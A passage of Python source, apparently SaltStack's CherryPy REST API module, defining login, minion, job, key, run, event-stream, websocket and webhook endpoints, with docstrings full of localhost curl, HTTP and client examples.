cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
# Grab all available client interfaces
clients = [name for name, _ in inspect.getmembers(salt.netapi.NetapiClient,
predicate=inspect.ismethod) if not name.startswith('__')]
clients.remove('run') # run method calls client interfaces
return {
'return': "Welcome",
'clients': clients,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -si https://localhost:8000 \\
-H "Accept: application/x-yaml" \\
-H "X-Auth-Token: d40d1e1e" \\
-d client=local \\
-d tgt='*' \\
-d fun='test.ping' \\
-d arg
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
fun=test.ping&arg&client=local&tgt=*
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-H "Accept: application/x-yaml" \\
-d tgt='*' \\
-d fun='status.diskusage'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.lookup_jid' if jid else 'jobs.list_jobs',
'jid': jid,
}]
if jid:
lowstate.append({
'client': 'runner',
'fun': 'jobs.list_job',
'jid': jid,
})
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
job_ret, job_info = job_ret_info
ret['info'] = [job_info]
else:
job_ret = job_ret_info[0]
ret['return'] = [job_ret]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:module:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
self._cp_config['tools.salt_token.on'] = True
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
def POST(self, mid, keysize=None, force=None, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
.. versionadded:: 2014.7.0
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sS http://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS http://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
self._cp_config['tools.hypermedia_out.on'] = False
self._cp_config['tools.sessions.on'] = False
lowstate = [{
'client': 'wheel',
'fun': 'key.gen_accept',
'id_': mid,
}]
if keysize:
lowstate[0]['keysize'] = keysize
if force:
lowstate[0]['force'] = force
lowstate[0].update(kwargs)
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = StringIO.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, StringIO.StringIO(pub_key))
tarball.addfile(priv_key_file, StringIO.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(mid)
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-H "Accept: application/json" \\
-d username='saltuser' \\
-d password='saltpass' \\
-d eauth='pam'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept: application/json
username=saltuser&password=saltpass&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}]}
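**Example Python request** (a minimal sketch using the ``requests`` library; credentials are illustrative):
.. code-block:: python
    import requests
    resp = requests.post(
        'http://localhost:8000/login',
        data={'username': 'saltuser', 'password': 'saltpass', 'eauth': 'pam'},
        headers={'Accept': 'application/json'})
    token = resp.json()['return'][0]['token']
    # reuse the token on subsequent requests
    minions = requests.get(
        'http://localhost:8000/minions',
        headers={'X-Auth-Token': token, 'Accept': 'application/json'})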
'''
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
perms = eauth.get(token['name'], eauth.get('*'))
if perms is None:
raise ValueError("Eauth permission list not found.")
except (AttributeError, IndexError, KeyError, ValueError):
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
raise cherrypy.HTTPError(500,
'Configuration for external_auth could not be read.')
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms,
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='local' \\
-d tgt='*' \\
-d fun='test.ping' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='pam'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instead, authentication
should be handled by the SSH layer itself. The use of the salt-ssh client does not
require a salt master to be running. Instead, only a roster file must be present
in the salt configuration directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
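**Example Python request** (a minimal sketch using the ``requests`` library; credentials are illustrative):
.. code-block:: python
    import requests
    resp = requests.post(
        'http://localhost:8000/run',
        headers={'Accept': 'application/json'},
        json=[{'client': 'local', 'tgt': '*', 'fun': 'test.ping',
               'username': 'saltdev', 'password': 'saltdev', 'eauth': 'pam'}])
    print(resp.json()['return'])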
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_salt_token(self, salt_token):
'''
Check if this is a valid salt master token
More on salt master token generation can
be found at
http://docs.saltstack.com/en/latest/topics/eauth/index.html#tokens
Returns
True if this token is a valid salt token
False otherwise
'''
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def _is_valid_salt_api_token(self, salt_api_token):
'''
Check if this is a valid salt api token
Salt API tokens are generated on Login
Returns
True if this token is a valid salt api token
False otherwise
'''
if not salt_api_token:
return False
# Pulling the session token from a URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if salt_api_token:
orig_session, _ = cherrypy.session.cache.get(salt_api_token,
({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if salt_token and self.auth.get_tok(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events?salt_token=307427657b16a70aed360a46c5370035
Or you can pass the token sent by cherrypy's
`/login` endpoint (these are different tokens).
:ref:`salt-token-generation` describes the process of obtaining a
Salt token.
.. code-block:: bash
curl -NsS localhost:8000/events?token=308650dbd728d8405a32ac9c2b2c1ed7705222bc
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
data: {'tag': '', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
data: {'tag': '20130802115730568475', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75');
// Salt token works as well!
// var source = new EventSource('/events?salt_token=307427657b16a70aed360a46c5370035');
source.onopen = function() { console.debug('opening') };
source.onerror = function(e) { console.debug('error!', e) };
source.onmessage = function(e) { console.debug(e.data) };
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
// You can supply the salt token as well
var source = new EventSource('/events?salt_token=307427657b16a70aed360a46c5370035', {withCredentials: true});
Some browser clients lack CORS support for the ``EventSource()`` API. Such
clients may instead pass the :mailheader:`X-Auth-Token` value as a URL
parameter:
.. code-block:: bash
curl -NsS localhost:8000/events/6d1b722e
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events?salt_token=307427657b16a70aed360a46c5370035 |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events?salt_token=307427657b16a70aed360a46c5370035 |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
if (not (self._is_valid_salt_api_token(token) or
self._is_valid_salt_token(salt_token))):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:**
curl -NsS \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: http://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: http://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new WebSocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print(ws.recv())
ws.close()
The above examples show how to establish a websocket connection to Salt and
activate real-time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from a URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication; however, not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- 'curl -sS http://saltapi-url.example.com:8000/hook/travis/build/success -d branch="${TRAVIS_BRANCH}" -d commit="${TRAVIS_COMMIT}"'
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
foo=Foo&bar=Bar!
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``http://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
